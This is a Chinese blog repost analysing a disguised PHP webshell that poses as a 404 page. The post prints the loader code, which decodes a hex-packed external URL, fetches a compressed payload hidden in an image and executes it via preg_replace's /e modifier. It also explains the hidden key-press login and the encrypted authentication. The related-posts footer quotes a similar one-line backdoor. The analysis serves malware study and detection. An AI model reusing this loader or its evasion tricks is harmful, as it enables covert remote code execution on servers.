在线扫描php后门_一款猥琐的PHP后门分析

最新推荐文章于 2022-02-28 09:34:45 发布
最新推荐文章于 2022-02-28 09:34:45 发布
阅读量460 收藏
点赞数
文章标签: 在线扫描php后门
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_32389427/article/details/115105641
版权

近日,360网站卫士安全团队近期捕获一个基于PHP实现的webshell样本,其巧妙的代码动态生成方式,猥琐的自身页面伪装手法,让我们在分析这个样本的过程中感受到相当多的乐趣。接下来就让我们一同共赏这个奇葩的Webshell吧。

Webshell代码如下:<?php

error_reporting(0);

session_start();

header("Content-type:text/html;charset=utf-8");if(empty($_SESSION['api'])) $_SESSION['api']=substr(file_get_contents(sprintf('%s?%s',pack("H*",'687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067'),uniqid())),3649);

@preg_replace("~(.*)~ies",gzuncompress($_SESSION['api']),null);

?>

关键看下面这句代码,sprintf('%s?%s',pack("H*",'687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067'),uniqid())

这里执行之后其实是一张图片,解密出来的图片地址如下:http://7shell.googlecode.com/svn/make.jpg?53280b00f1e85

然后调用file_get_contents函数读取图片为字符串,然后substr取3649字节之后的内容,再调用gzuncompress解压,得到真正的代码。最后调用preg_replace的修饰符e来执行恶意代码的。这里执行以下语句来还原出恶意样本代码,<?php

echo gzuncompress(substr(file_get_contents(sprintf('%s?%s',pack("H*",'687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067'),uniqid())),3649));

?>

如图所示:

5bc09ab77eef4ce658740f8e4d056bbf.png

分析这段代码,发现这是一个伪装的404木马(这里实在是太猥琐了…),其实整个webshell就一个class外加三个function,如图

c6ae140930f03dcbd7bf2ade3b4e04e1.png

首先我先看一下它的前端html代码,其中有这么一段js程序document.onkeydown = function(e) {

vartheEvent = window.event || e;

var code = theEvent.keyCode || theEvent.which;

if (80 == code) {

$("login").style.display = "block"

}

}

这里它用document.onkeydown获取用户敲击键盘事件,当code等于80的时候显示login这个div,这里查询了一下keyCode的对照表,查到80对应p和P键

b9888fb7638ee311a5d353ff94948bc2.png

所以触发webshell登陆需要按p键(不按P键页面就是一个空白页,看不到登陆框),如图所示:

a90160dfc773dc1f6a9adc24c09f9ecb.png

再回到服务端php代码中,可以看到程序用的是对称加密,并且将登陆密码作为加密key,代码如图所示:

7b3a2682b09f89627514cc348f87b450.png

再看init()的逻辑

59a91a0ce86c522ce47d0f4f4de39642.png

如图所示,先看这句代码$true =

@gzuncompress(gzuncompress(Crypt::decrypt(pack('H*',  '789c63ac0bbec7b494f12cdb02f6dfac3f833731cf093e163a892990793ebf0a9f1c6b18bb68983b3b47a022002a840c59'), $_POST['key'], true)));

根据这个解密逻辑我们可以推出,这里其实是将字符串true做了以下加密处理,unpack('H*',Crypt::encrypt(gzcompress(gzcompress('true')),$_POST['key'] , true))

所以当输入正确密码的时候@gzuncompress返回字符串true,然后程序调用setcookie给客户端返回$_COOKIE[‘key’],然后值得提一下的是后面这个exit('{"status":"on"}'),这里它与前端代码联系很紧密,我们看前端有个callback函数,如下function callback() {

varjson = eval("(" + this.responseText + ")");

if (json.status=='on'){

window.location.reload();

return;

}

if (json.notice) {

$("notice").style.display = "block";

$("notice").innerHTML = json.notice;

sideOut();

}

}

这里执行exit('{"status":"on"}')会返回json串{"status":"on"},此时前端js代码classback()获取到此响应会执行window.location.reload()刷新,再次请求正好带上前面获取的cookie,然后执行判断COOKIE的逻辑,如图所示

1a21c3cd0cbf50f294a7a8ff6e6499ec.png

这里跟前面POST的逻辑一样,下面当判断为’true’以后,这里又请求了一张图片,pack出来地址为http://2012heike.googlecode.com/svn/trunk/code.jpg,然后调用_REQUEST获取图片内容,解密解压之后再eval,分析之后发现code.jpg中才是真正的webshell经过加密压缩之后的内容。这里我跟踪了一下代码打印出了真正执行的webshell的内容,

a516a1bec3a31000ff2e9cb239ea8744.png

登陆成功之后如图所示:

5e255eac565dc123d12a7085b903fb33.png

总结:

这是一个高度隐蔽的webshell,它没有在其代码中用到一些危险函数和敏感字,而是将真正的shell内容经过层层加密处理之后保存到图片当中,丢到服务器上只留下一个url,并且url还是经过加密处理的,所以对外看没有任何特征可寻,过掉了大多数waf以及杀软的查杀。。作者的利用思路新颖,并且前端后端结合紧密,代码精简,各种奇技淫巧,有别于常见的webshell后门,令人佩服!

挽.歌
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP WebSehll 后门脚本与检测工具
悦分享
08-01 1366
PHP是一种动态弱类型语言,参数传递、类型转换、函数调用方式都非常灵活,这给开发者带来开发便利的同时,也给攻击者编写各种畸形恶意代码带来了很多便利,通过翻阅PHP手册
php在线查杀扫描webshell后门 对接WEBDIR+ Api
10-04
使用PHP对接百度 WebDir在线查杀接口 作者来源:https://mubaisu.com/webdir.html 并处理判断返回结果,使在线查杀文件不在是梦想~ 无需任何扩展和依赖限制 只要你服务器可以跑php 缺点:每次查杀都需要上传文件到...
在线扫描php后门_webshell后门扫描-PHP
weixin_35740545的博客
03-09 1157
/**********************php扫描后门**********************/error_reporting(E_ERROR);ini_set(’max_execution_time’,20000);ini_set(’memory_limit’,’512M’);header("content-Type: text/html; charset=gb2312");$matc...
在线扫描php后门_解密php webshell后门
weixin_42400643的博客
03-09 498
仅将此文献给还在为别人的webshell做出贡献的同学。拿下一个网站后,理所当然的传webshll,提权。但是一些人会在webshell中插入小小的一段代码,这样你辛苦拿下的webshell的地址和密码等等就会统统发送给在webshell插后门的人。这段代码可大可小,下面是我随便找的一个phpwebshell,来解密一下其中的后门。首先是用记事本打开这个webshell,可以看到,这个shell的...
在线扫描php后门_PHP扫描php后门、WebShell、一句话后门
weixin_34646207的博客
03-09 592
PHP扫描php后门、WebShell、一句话后门PHP web shell scandefine("SELF",php_self());error_reporting(E_ERROR);ini_set('max_execution_time',20000);ini_set('memory_limit','512M');header("content-Type: text/html; chars...
在线检测php后门,php后门简单检测脚本
weixin_36018183的博客
03-09 1357
# coding:utf-8import osimport sysimport rerulelist = ['(\$_(GET|POST|REQUEST)\[.{0,15}\]\(\$_(GET|POST|REQUEST)\[.{0,15}\]\))','(base64_decode\([\'"][\w\+/=]{200,}[\'"]\))','eval\(base64_decode\(','(e...
php一句话后门,PHP一句话后门集锦
weixin_42436686的博客
03-10 681
404页面的利用:404 Not FoundNot FoundThe requested URL was not found on this server.@preg_replace("/[pageerror]/e",$_POST['error'],"saft");header('HTTP/1.1 404 Not Found');?>404页面是网站常用的文件,一般建议好后很少有人会去对它进...
php扫描功能,phpscanphp后门扫描神器
weixin_34307867的博客
03-21 1039
扫描备份工具 源码 ,python 实现, 扫描备份工具 源码 ,python 实现 扫描备份工具 源码 ,python 实现 扫描备份工具 源码 ,python 实现 扫描备份工具 源码 ,python 实现能针对PHP大马,PHP小马,PHP一句话,建网站PHP执行命令,UDF提权,SQL语句,COM组件调用,上传,怎样建网站越权,等后门进行扫描。 特点: 1.误报率极低。 2.兼容各种下,w...
php后门工具_教你识别简单的免查杀PHP后门
weixin_31684041的博客
03-08 1070
一个最常见的一句话后门可能写作这样或这样tudouya 同学在FREEBUF上给出[一种构造技巧]利用构造生成,当然,嫌太直观可以写作这样然后再填充些普通代码进行伪装,一个简单的”免杀”shell样本就出现了我们再来看看号称史上最简单免查杀php后门直接上代码:$c=urldecode($_GET['c']);if($c){`$c`;}//完整!$_GET['c']||`{$_GET['c']}`...
java大马后门_PHP大马后门分析
weixin_30479433的博客
03-01 259
PHP大马后门分析PHP大马PHP大马,用php写的木马文件,一般自带提权,操作数据库,反弹shell,文件下载,端口扫描等功能。网上很多地方都能下载到这些木马,但是大部门大马都会自带有后门,也就是当你上传木马到别人的服务器上的时候,该大马的制作者同样会通过后门获得服务器的权限。今天就来分析一波该大马中的后门分析大马文件打开下载的php大马,可以看出该大马是经过加密了的。解密一下,如下图步骤解密...
PHP大马后门分析
qq_17754023的博客
02-28 4034
PHP大马,用php写的木马文件,一般自带提权,操作数据库,反弹shell,文件下载,端口扫描等功能。网上很多地方都能下载到这些木马,但是大部门大马都会自带有后门,也就是当你上传木马到别人的服务器上的时候,该大马的制作者同样会通过后门获得服务器的权限。今天就来分析一波该大马中的后门分析大马文件 打开下载的php大马,可以看出该大马是经过加密了的。 加密不用说,一看就是有后门 从源码开头可以看见 eval(gzinflate(base64_decode(" base64+gzin..
3个php后门WebShell木马扫描神器
10-09
3个php后门WebShell木马扫描神器,通过这个可以快速的扫描别人给予的代码里面是否包含后门代码,扫描自己网站服务器里面有没有后门,虚拟主机也可以用,密码打开文件修改,放入根目录,输入网址运行即可。
phpscan,php后门扫描神器
08-12
phpscan,php后门扫描神器,通过这个可以快速的扫描别人给予的代码里面是否包含后门代码,里面附详细的使用说明
2019年php后门扫描文件
06-22
php后门扫描文件,下载该文件放到网站根目录,直接访问即可扫描
360webscan后门查杀php专版
04-18
自用的,360webscan后门查杀php专版,3个文件均能扫描,上传到网站根目录下运行
基于PHP的Mysql BackDoor PHP+Mysql服务器 后门.zip
07-22
由于其广泛使用,PHP后门成为网络安全领域一个常见的问题。 在压缩包子文件的文件名称列表中,"132690149690338863"看似是一个随机的数字串,这可能是单一文件的名称或者是多个文件的一部分。在实际情况下,这样的...
phpStudy_2016.11.03后门版.zip
09-29
3. **安全扫描**:利用自动化工具扫描可能的漏洞和后门,如VirusTotal等在线扫描服务。 4. **隔离测试**:在非生产环境中测试可疑软件,观察其行为,避免影响到关键系统。 5. **监控日志**:密切关注服务器日志,...
php万能后门程序
09-11
PHP后门是指一种特殊设计的PHP脚本,能够使攻击者在目标服务器上获得持久的、隐蔽的访问权限。这些后门通常是隐藏的,不易被安全扫描工具检测到。它们可以伪装成正常的功能模块,或者通过注入到现有的PHP文件中来...
PHP_saomiao.zip_php 安全
09-23
"PHP_saomiao.zip_php 安全"这个压缩包文件,显然是为了帮助开发者或系统管理员检测PHP网站是否存在后门和安全漏洞而设计的工具。下面,我们将深入探讨PHP安全相关的知识点。 首先,**后门**是指恶意攻击者在网站中...
php源码扫描后门工具
最新发布
01-23
PHP源码扫描后门工具是一种可以帮助开发者检测PHP源代码中是否存在后门的工具。这种工具通常会使用静态代码分析技术,对PHP源码进行深入扫描分析,以便找出可能存在的后门代码或者安全漏洞。 这种工具的工作原理通常是通过识别常见的后门代码特征,如eval、assert、system等函数的调用,或者是通过检测非常规的文件操作、远程代码执行等可疑行为。一旦发现可能存在后门的代码片段,工具会向开发者报告,以便开发者可以及时对代码进行修复和加固。 PHP源码扫描后门工具对于保障PHP代码的安全性非常重要。因为PHP是一种开放式的脚本语言,用户可以较为灵活地编写各种代码,但同时也容易受到恶意攻击者的攻击。使用这种工具可以帮助开发者及时发现并修复潜在的安全隐患,保障系统的安全性。 当然,虽然PHP源码扫描后门工具可以发挥一定的作用,但它并不是万能的。开发者在使用这种工具的同时,还需要注重编码规范和安全意识的培养,定期对代码进行审查和加固,以建立一个更加健壮和安全的PHP应用系统。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值